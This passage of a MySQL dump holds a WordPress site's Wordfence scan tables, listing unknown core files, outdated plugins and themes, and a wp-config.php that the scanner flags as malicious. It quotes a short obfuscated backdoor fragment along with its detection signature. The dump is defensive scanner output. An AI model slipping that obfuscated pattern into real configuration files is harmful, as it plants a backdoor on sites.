/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=582 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (537,1629513650,1629513650,'new','knownfile',75,'a85cae3b1a00dda355c3ded5339a4c3c','217113c6d15fe585bde001c8e2269778','Unknown file in WordPress core: wp-admin/.bt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:12:\"wp-admin/.bt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(538,1629513651,1629513651,'new','knownfile',75,'4c24be48f968d69bd60314fae3bc37d1','2b2192ac8b487a82d4f9ee11c81cb5c1','Unknown file in WordPress core: wp-admin/css/.bt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:16:\"wp-admin/css/.bt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(539,1629513858,1629513858,'new','knownfile',75,'bc0e1e98251a9ecbbbfd1638b3a60bff','44c9694bf8fafec3d3d15c94a2499d1e','Unknown file in WordPress core: wp-includes/pomo/pomo/entry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:31:\"wp-includes/pomo/pomo/entry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(540,1629513858,1629513858,'new','knownfile',75,'f0ca8859087c27712491046669d9090e','620c3ffdf68920e27a7834b774547252','Unknown file in WordPress core: wp-includes/pomo/pomo/mo.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/mo.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(541,1629513858,1629513858,'new','knownfile',75,'6c0d45deb56eb69f4100ab72b98d18a2','d11b3440081ddccd55bfdf2cc2a11901','Unknown file in WordPress core: wp-includes/pomo/pomo/plural-forms.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/plural-forms.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(542,1629513858,1629513858,'new','knownfile',75,'66fc81b51e18fb67e3ff8b11bd378ebe','a7b1d80a7b7c9a37dd357357f80720d4','Unknown file in WordPress core: wp-includes/pomo/pomo/po.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/po.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(543,1629513858,1629513858,'new','knownfile',75,'54b1379f429ead0b05c5679d25ddfe92','483fe8d0dc2f62591bc8c2efc2190bd8','Unknown file in WordPress core: wp-includes/pomo/pomo/streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:33:\"wp-includes/pomo/pomo/streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(544,1629513858,1629513858,'new','knownfile',75,'64bac185b3e6cab863ec6f49ca6a61e3','baaf322ae29febdddecae999f621ac77','Unknown file in WordPress core: wp-includes/pomo/pomo/translations.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/translations.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(545,1629513872,1629513872,'new','file',100,'1ab2c0d5e47db3ec5681c7e882289e8d','d08b917fccbe0c11d438c1e2b624ff7e','File appears to be malicious or unsafe: wp-config.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <strong style=\"color: #F00;\" class=\"wf-split-word\">$ao($oa(&quot;$pass&quot;), &#039;wp_</strong> <br><br>The issue type is: <strong>Suspicious:PHP/doublevarfnb64.6913</strong><br>Description: <strong>Suspicious code pattern often indicating malware</strong>','a:9:{s:4:\"file\";s:13:\"wp-config.php\";s:4:\"shac\";s:64:\"A0F79B02ECCEB45CE3C5F85D1D45D394D272E0E2BC9D97429F77E3D83DDC6A7A\";s:9:\"highSense\";b:0;s:8:\"betaSigs\";s:1:\"0\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:0;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:1;}'),(573,1629713828,1629713828,'new','wfUpgrade',75,'4215230377354b899cb8bd1b0ba04441','4215230377354b899cb8bd1b0ba04441','Your WordPress version is out of date','WordPress version 5.8 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.7.2\";s:10:\"newVersion\";s:3:\"5.8\";}'),(574,1629713828,1629713828,'new','wfPluginUpgrade',50,'f04101cb1c2293a58617826ec94a99c1','f04101cb1c2293a58617826ec94a99c1','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.9 -> 4.1.10).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:5:\"4.1.9\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:71:\"/home/ashbooks.co.uk/public_html/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:6:\"4.1.10\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(575,1629713828,1629713828,'new','wfPluginUpgrade',50,'9240ea17331cebd6d2505aa3bf651783','9240ea17331cebd6d2505aa3bf651783','The Plugin \"All In One WP Security\" needs an upgrade (4.4.8 -> 4.4.9).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:5:\"4.4.8\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:103:\"/home/ashbooks.co.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"4.4.9\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:0;}'),(576,1629713828,1629713828,'new','wfPluginUpgrade',50,'81537aa5b5f58b3ef7e5a56c105f8224','81537aa5b5f58b3ef7e5a56c105f8224','The Plugin \"Wordfence Security\" needs an upgrade (7.5.4 -> 7.5.5).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.4\";s:11:\"Description\";s:131:\"Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:75:\"/home/ashbooks.co.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.5.5\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:0;}'),(577,1629713828,1629713828,'new','wfPluginUpgrade',100,'fb86e4ebe867e990771a8152d9b622a0','fb86e4ebe867e990771a8152d9b622a0','The Plugin \"WP Cerber Security, Anti-spam &amp; Malware Scan\" needs an upgrade (8.8.5 -> 8.9.3).','You need to upgrade \"WP Cerber Security, Anti-spam &amp; Malware Scan\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam &amp; Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.8.5\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam &amp; Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:10:\"pluginFile\";s:75:\"/home/ashbooks.co.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php\";s:10:\"newVersion\";s:5:\"8.9.3\";s:4:\"slug\";s:9:\"wp-cerber\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wp-cerber\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}'),(578,1629713828,1629713828,'new','wfThemeUpgrade',50,'544e3fe2328061a91199ead81e0d4530','544e3fe2328061a91199ead81e0d4530','The Theme \"Magazine Hoot\" needs an upgrade (1.9.15 -> 1.9.19).','You need to upgrade \"Magazine Hoot\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:6:\"1.9.19\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/magazine-hoot.1.9.19.zip\";s:3:\"URL\";s:43:\"https://wordpress.org/themes/magazine-hoot/\";s:4:\"Name\";s:13:\"Magazine Hoot\";s:4:\"name\";s:13:\"Magazine Hoot\";s:7:\"version\";s:6:\"1.9.15\";s:10:\"vulnerable\";b:0;}'),(579,1629713828,1629713828,'new','wfThemeUpgrade',50,'b1f40133224ebd37d11a57212569e7b7','b1f40133224ebd37d11a57212569e7b7','The Theme \"Twenty Nineteen\" needs an upgrade (2.0 -> 2.1).','You need to upgrade \"Twenty Nineteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:4:\"Name\";s:15:\"Twenty Nineteen\";s:4:\"name\";s:15:\"Twenty Nineteen\";s:7:\"version\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}'),(580,1629713828,1629713828,'new','wfThemeUpgrade',50,'b4aa3a5a0b6b6ad3791cccd0ead6da3c','b4aa3a5a0b6b6ad3791cccd0ead6da3c','The Theme \"Twenty Twenty\" needs an upgrade (1.7 -> 1.8).','You need to upgrade \"Twenty Twenty\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.8\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:4:\"Name\";s:13:\"Twenty Twenty\";s:4:\"name\";s:13:\"Twenty Twenty\";s:7:\"version\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}'),(581,1629713828,1629713828,'new','wfThemeUpgrade',50,'2fe1115c1ca9c416ae1e8e7aea44d03e','2fe1115c1ca9c416ae1e8e7aea44d03e','The Theme \"Twenty Twenty-One\" needs an upgrade (1.3 -> 1.4).','You need to upgrade \"Twenty Twenty-One\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.4\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:4:\"Name\";s:17:\"Twenty Twenty-One\";s:4:\"name\";s:17:\"Twenty Twenty-One\";s:7:\"version\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3564 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wp-activate.php'),(5,'wp-admin/.bt'),(6,'wp-admin/about.php'),(7,'wp-admin/admin-ajax.php'),(8,'wp-admin/admin-footer.php'),(9,'wp-admin/admin-functions.php'),(10,'wp-admin/admin-header.php'),(11,'wp-admin/admin-post.php'),(12,'wp-admin/admin.php'),(13,'wp-admin/async-upload.php'),(14,'wp-admin/authorize-application.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/.bt'),(18,'wp-admin/css/about-rtl.css'),(19,'wp-admin/css/about-rtl.min.css'),(20,'wp-admin/css/about.css'),(21,'wp-admin/css/about.min.css'),(22,'wp-admin/css/admin-menu-rtl.css'),(23,'wp-admin/css/admin-menu-rtl.min.css'),(24,'wp-admin/css/admin-menu.css'),(25,'wp-admin/css/admin-menu.min.css'),(26,'wp-admin/css/code-editor-rtl.css'),(27,'wp-admin/css/code-editor-rtl.min.css'),(28,'wp-admin/css/code-editor.css'),(29,'wp-admin/css/code-editor.min.css'),(30,'wp-admin/css/color-picker-rtl.css'),(31,'wp-admin/css/color-picker-rtl.min.css'),(32,'wp-admin/css/color-picker.css'),(33,'wp-admin/css/color-picker.min.css'),(34,'wp-admin/css/colors/_admin.scss'),(35,'wp-admin/css/colors/_mixins.scss'),(36,'wp-admin/css/colors/_variables.scss'),(37,'wp-admin/css/colors/blue/colors-rtl.css'),(38,'wp-admin/css/colors/blue/colors-rtl.min.css'),(39,'wp-admin/css/colors/blue/colors.css'),(40,'wp-admin/css/colors/blue/colors.min.css'),(41,'wp-admin/css/colors/blue/colors.scss'),(42,'wp-admin/css/colors/coffee/colors-rtl.css'),(43,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(44,'wp-admin/css/colors/coffee/colors.css'),(45,'wp-admin/css/colors/coffee/colors.min.css'),(46,'wp-admin/css/colors/coffee/colors.scss'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(48,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(49,'wp-admin/css/colors/ectoplasm/colors.css'),(50,'wp-admin/css/colors/ectoplasm/colors.min.css'),(51,'wp-admin/css/colors/ectoplasm/colors.scss'),(52,'wp-admin/css/colors/light/colors-rtl.css'),(53,'wp-admin/css/colors/light/colors-rtl.min.css'),(54,'wp-admin/css/colors/light/colors.css'),(55,'wp-admin/css/colors/light/colors.min.css'),(56,'wp-admin/css/colors/light/colors.scss'),(57,'wp-admin/css/colors/midnight/colors-rtl.css'),(58,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(59,'wp-admin/css/colors/midnight/colors.css'),(60,'wp-admin/css/colors/midnight/colors.min.css'),(61,'wp-admin/css/colors/midnight/colors.scss'),(62,'wp-admin/css/colors/modern/colors-rtl.css'),(63,'wp-admin/css/colors/modern/colors-rtl.min.css'),(64,'wp-admin/css/colors/modern/colors.css'),(65,'wp-admin/css/colors/modern/colors.min.css'),(66,'wp-admin/css/colors/modern/colors.scss'),(67,'wp-admin/css/colors/ocean/colors-rtl.css'),(68,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(69,'wp-admin/css/colors/ocean/colors.css'),(70,'wp-admin/css/colors/ocean/colors.min.css'),(71,'wp-admin/css/colors/ocean/colors.scss'),(72,'wp-admin/css/colors/sunrise/colors-rtl.css'),(73,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(74,'wp-admin/css/colors/sunrise/colors.css'),(75,'wp-admin/css/colors/sunrise/colors.min.css'),(76,'wp-admin/css/colors/sunrise/colors.scss'),(77,'wp-admin/css/common-rtl.css'),(78,'wp-admin/css/common-rtl.min.css'),(79,'wp-admin/css/common.css'),(80,'wp-admin/css/common.min.css'),(81,'wp-admin/css/customize-controls-rtl.css'),(82,'wp-admin/css/customize-controls-rtl.min.css'),(83,'wp-admin/css/customize-controls.css'),(84,'wp-admin/css/customize-controls.min.css'),(85,'wp-admin/css/customize-nav-menus-rtl.css'),(86,'wp-admin/css/customize-nav-menus-rtl.min.css'),(87,'wp-admin/css/customize-nav-menus.css'),(88,'wp-admin/css/customize-nav-menus.min.css'),(89,'wp-admin/css/customize-widgets-rtl.css'),(90,'wp-admin/css/customize-widgets-rtl.min.css'),(91,'wp-admin/css/customize-widgets.css'),(92,'wp-admin/css/customize-widgets.min.css'),(93,'wp-admin/css/dashboard-rtl.css'),(94,'wp-admin/css/dashboard-rtl.min.css'),(95,'wp-admin/css/dashboard.css'),(96,'wp-admin/css/dashboard.min.css'),(97,'wp-admin/css/deprecated-media-rtl.css'),(98,'wp-admin/css/deprecated-media-rtl.min.css'),(99,'wp-admin/css/deprecated-media.css'),(100,'wp-admin/css/deprecated-media.min.css'),(101,'wp-admin/css/edit-rtl.css'),(102,'wp-admin/css/edit-rtl.min.css'),(103,'wp-admin/css/edit.css'),(104,'wp-admin/css/edit.min.css'),(105,'wp-admin/css/farbtastic-rtl.css'),(106,'wp-admin/css/farbtastic-rtl.min.css'),(107,'wp-admin/css/farbtastic.css'),(108,'wp-admin/css/farbtastic.min.css'),(109,'wp-admin/css/forms-rtl.css'),(110,'wp-admin/css/forms-rtl.min.css'),(111,'wp-admin/css/forms.css'),(112,'wp-admin/css/forms.min.css'),(113,'wp-admin/css/install-rtl.css'),(114,'wp-admin/css/install-rtl.min.css'),(115,'wp-admin/css/install.css'),(116,'wp-admin/css/install.min.css'),(117,'wp-admin/css/l10n-rtl.css'),(118,'wp-admin/css/l10n-rtl.min.css'),(119,'wp-admin/css/l10n.css'),(120,'wp-admin/css/l10n.min.css'),(121,'wp-admin/css/list-tables-rtl.css'),(122,'wp-admin/css/list-tables-rtl.min.css'),(123,'wp-admin/css/list-tables.css'),(124,'wp-admin/css/list-tables.min.css'),(125,'wp-admin/css/login-rtl.css'),(126,'wp-admin/css/login-rtl.min.css'),(127,'wp-admin/css/login.css'),(128,'wp-admin/css/login.min.css'),(129,'wp-admin/css/media-rtl.css'),(130,'wp-admin/css/media-rtl.min.css'),(131,'wp-admin/css/media.css'),(132,'wp-admin/css/media.min.css'),(133,'wp-admin/css/nav-menus-rtl.css'),(134,'wp-admin/css/nav-menus-rtl.min.css'),(135,'wp-admin/css/nav-menus.css'),(136,'wp-admin/css/nav-menus.min.css'),(137,'wp-admin/css/revisions-rtl.css'),(138,'wp-admin/css/revisions-rtl.min.css'),(139,'wp-admin/css/revisions.css'),(140,'wp-admin/css/revisions.min.css'),(141,'wp-admin/css/site-health-rtl.css'),(142,'wp-admin/css/site-health-rtl.min.css'),(143,'wp-admin/css/site-health.css'),(144,'wp-admin/css/site-health.min.css'),(145,'wp-admin/css/site-icon-rtl.css'),(146,'wp-admin/css/site-icon-rtl.min.css'),(147,'wp-admin/css/site-icon.css'),(148,'wp-admin/css/site-icon.min.css'),(149,'wp-admin/css/themes-rtl.css'),(150,'wp-admin/css/themes-rtl.min.css'),(151,'wp-admin/css/themes.css'),(152,'wp-admin/css/themes.min.css'),(153,'wp-admin/css/widgets-rtl.css'),(154,'wp-admin/css/widgets-rtl.min.css'),(155,'wp-admin/css/widgets.css'),(156,'wp-admin/css/widgets.min.css'),(157,'wp-admin/css/wp-admin-rtl.css'),(158,'wp-admin/css/wp-admin-rtl.min.css'),(159,'wp-admin/css/wp-admin.css'),(160,'wp-admin/css/wp-admin.min.css'),(161,'wp-admin/custom-background.php'),(162,'wp-admin/custom-header.php'),(163,'wp-admin/customize.php'),(164,'wp-admin/edit-comments.php'),(165,'wp-admin/edit-form-advanced.php'),(166,'wp-admin/edit-form-blocks.php'),(167,'wp-admin/edit-form-comment.php'),(168,'wp-admin/edit-link-form.php'),(169,'wp-admin/edit-tag-form.php'),(170,'wp-admin/edit-tags.php'),(171,'wp-admin/edit.php'),(172,'wp-admin/erase-personal-data.php'),(173,'wp-admin/export-personal-data.php'),(174,'wp-admin/export.php'),(175,'wp-admin/freedoms.php'),(176,'wp-admin/images/about-badge.svg'),(177,'wp-admin/images/about-color-palette-vert.svg'),(178,'wp-admin/images/about-color-palette.svg'),(179,'wp-admin/images/about-header-brushes.svg'),(180,'wp-admin/images/align-center-2x.png'),(181,'wp-admin/images/align-center.png'),(182,'wp-admin/images/align-left-2x.png'),(183,'wp-admin/images/align-left.png'),(184,'wp-admin/images/align-none-2x.png'),(185,'wp-admin/images/align-none.png'),(186,'wp-admin/images/align-right-2x.png'),(187,'wp-admin/images/align-right.png'),(188,'wp-admin/images/arrows-2x.png'),(189,'wp-admin/images/arrows.png'),(190,'wp-admin/images/browser-rtl.png'),(191,'wp-admin/images/browser.png'),(192,'wp-admin/images/bubble_bg-2x.gif'),(193,'wp-admin/images/bubble_bg.gif'),(194,'wp-admin/images/comment-grey-bubble-2x.png'),(195,'wp-admin/images/comment-grey-bubble.png'),(196,'wp-admin/images/date-button-2x.gif'),(197,'wp-admin/images/date-button.gif'),(198,'wp-admin/images/freedoms.png'),(199,'wp-admin/images/generic.png'),(200,'wp-admin/images/icons32-2x.png'),(201,'wp-admin/images/icons32-vs-2x.png'),(202,'wp-admin/images/icons32-vs.png'),(203,'wp-admin/images/icons32.png'),(204,'wp-admin/images/imgedit-icons-2x.png'),(205,'wp-admin/images/imgedit-icons.png'),(206,'wp-admin/images/list-2x.png'),(207,'wp-admin/images/list.png'),(208,'wp-admin/images/loading.gif'),(209,'wp-admin/images/marker.png'),(210,'wp-admin/images/mask.png'),(211,'wp-admin/images/media-button-2x.png'),(212,'wp-admin/images/media-button-image.gif'),(213,'wp-admin/images/media-button-music.gif'),(214,'wp-admin/images/media-button-other.gif'),(215,'wp-admin/images/media-button-video.gif'),(216,'wp-admin/images/media-button.png'),(217,'wp-admin/images/menu-2x.png'),(218,'wp-admin/images/menu-vs-2x.png'),(219,'wp-admin/images/menu-vs.png'),(220,'wp-admin/images/menu.png'),(221,'wp-admin/images/no.png'),(222,'wp-admin/images/post-forma